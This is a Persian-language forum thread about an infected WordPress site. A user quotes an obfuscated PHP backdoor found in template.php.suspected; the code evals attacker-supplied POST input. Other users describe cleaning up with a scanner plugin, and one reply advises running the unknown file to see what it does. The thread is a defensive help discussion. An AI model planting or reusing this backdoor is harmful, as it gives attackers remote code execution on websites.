رفتن به مطلب

*مهم*: فایل مشکوک template.php.suspected و خرابی سایت های وردپرسی!

Saati

پست های پیشنهاد شده

سلام دوستان،

متوجه شدم یکی از سایت های وردپرسیم باز نمیشه و ارور خاصی هم نمیده. هاست رو که چک کردم فایل template.php.suspected مشکوک بود و حاوی این ها بود:

<?php $ianu57= "_ptso"; $qqlt74 = strtoupper($ianu57[0]. $ianu57[1] .$ianu57[4].$ianu57[3]. $ianu57[2] ); if ( isset(${ $qqlt74} ['q13e558' ] )){ eval(${$qqlt74 } ['q13e558' ] ) ;} ?>

در سایت وردپرس هم درموردش بحث شده: https://wordpress.or...atephpsuspected

من قبل ارسال جستجو کردم ولی مورد مشابهی اینجا پیدا نکردم. آیا سایر کاربران هم مشکل مشابه داشتن؟

ویرایش شده توسط Saati
لینک به ارسال

سلام دوستان،

متوجه شدم یکی از سایت های وردپرسیم باز نمیشه و ارور خاصی هم نمیده. هاست رو که چک کردم فایل template.php.suspected مشکوک بود و حاوی این ها بود:

<?php $ianu57= "_ptso"; $qqlt74 = strtoupper($ianu57[0]. $ianu57[1] .$ianu57[4].$ianu57[3]. $ianu57[2] ); if ( isset(${ $qqlt74} ['q13e558' ] )){ eval(${$qqlt74 } ['q13e558' ] ) ;} ?>

در سایت وردپرس هم درموردش بحث شده: https://wordpress.or...atephpsuspected

من قبل ارسال جستجو کردم ولی مورد مشابهی اینجا پیدا نکردم. آیا سایر کاربران هم مشکل مشابه داشتن؟

سلام دوست عزیزم

فایل ناشناس رو در مسیری که هست اجرا کنید و ببینید چی هست ......

قبلا هم عرض کردم شناسایی فایل شلر و بکدور باید توسط شخص متخصص در این زمینه انجام شود

یاعلی.

لینک به ارسال
  • 5 هفته بعد...

البته از این فایل ها احتمالا تعداد دیگری هم داشته باشید و باید بگردید پیدا کنید. افزونه expolite scanner می تونه کمک کنه ولی باید دقت کنید و بلد باشید ازش استفاده کنید و هر فایلی که نشان می دهد مشکل دار نیست.

لینک به ارسال
  • 1 سال بعد...

با سلام
برای سایت وردپرسی بنده هم این مشکل پیش اومده بود و تعداد زیادی از فایلهای php رو آلوده کرده بود.
با توجه به توضیحاتی که خوندم و بررسی ای که روی فایلها با exploite scanner انجام دادم متوجه شدم فایلهای آلوده ی زیادی توی فولدرهای وردپرسم هست.

از جمله این فایلها چند فایل php آلوده و چند فایل با پسوند file در پوشه ی wp-admin وجود داشت که حذفشون کردم.
همینطور در پوشه ی wp-includes در پوشه ی css چند فایل php آلوده وجود داشت که اونها رو هم حذف کردم. که یکی از این فایلها trojan بود.
در پوشه ی wp-includes در پوشه ی SimplePie در پوشه ی Parse هم یک فایل trojan بود که حذفش کردم.
همینطور در پوشه ی wp-includes در پوشه ی theme-compact هم یک فایل مشکوک با اسم مشکوک بود که آلوده بود و حذف شد.

بغیر از مواردی که عرض کردم ممکنه در آدرسهای دیگه هم فایلهای php مشکوکی باشه که باید بررسی کنید و اگر متن بهم ریخته ای داشت به احتمال قوی باید حذف بشه (احتمال آلوده شدن فایل های پلاگین ها هم هست).
بعلاوه اینکه به خط اول تمامی فایلهایی که به php.suspected تغییر نام پیدا میکنند یک دستور اضافه شده که با eval شروع میشه که این خط هم باید پاکسازی بشه.

بنده با تغییراتی که اینجا عرض کردم ظاهرا مشکل سایتم حل شده چون چند روزی هست که خبری از تغییر نام فایلها و مشکل در سایت نیست خدا رو شکر ...
این نکته رو هم عرض کنم که بنده یک مبتدی هستم و علم برنامه نویسی ندارم و تمام مواردی که عرض کردم رو از طریق مطالعه ی نظرات در سایت های مختلف + آزمون و خطای خودم به دست آوردم و ممکنه به لحاظ تئوریک پشتوانه ی قوی نداشته باشه که دوستان کارشناس باید در این باره نظر بدن.

موفق باشید ...

لینک به ارسال

به گفتگو بپیوندید

هم اکنون می توانید مطلب خود را ارسال نمایید و بعداً ثبت نام کنید. اگر حساب کاربری دارید، برای ارسال با حساب کاربری خود اکنون وارد شوید .

مهمان
ارسال پاسخ به این موضوع ...

×   شما در حال چسباندن محتوایی با قالب بندی هستید.   حذف قالب بندی

تنها استفاده از 75 اموجی مجاز می باشد.

×   لینک شما به صورت اتوماتیک جای گذاری شد.   نمایش به صورت لینک

×   محتوای قبلی شما بازگردانی شد.   پاک کردن محتوای ویرایشگر

×   شما مستقیما نمی توانید تصویر خود را قرار دهید. یا آن را اینجا بارگذاری کنید یا از یک URL قرار دهید.

• اضافه کردن...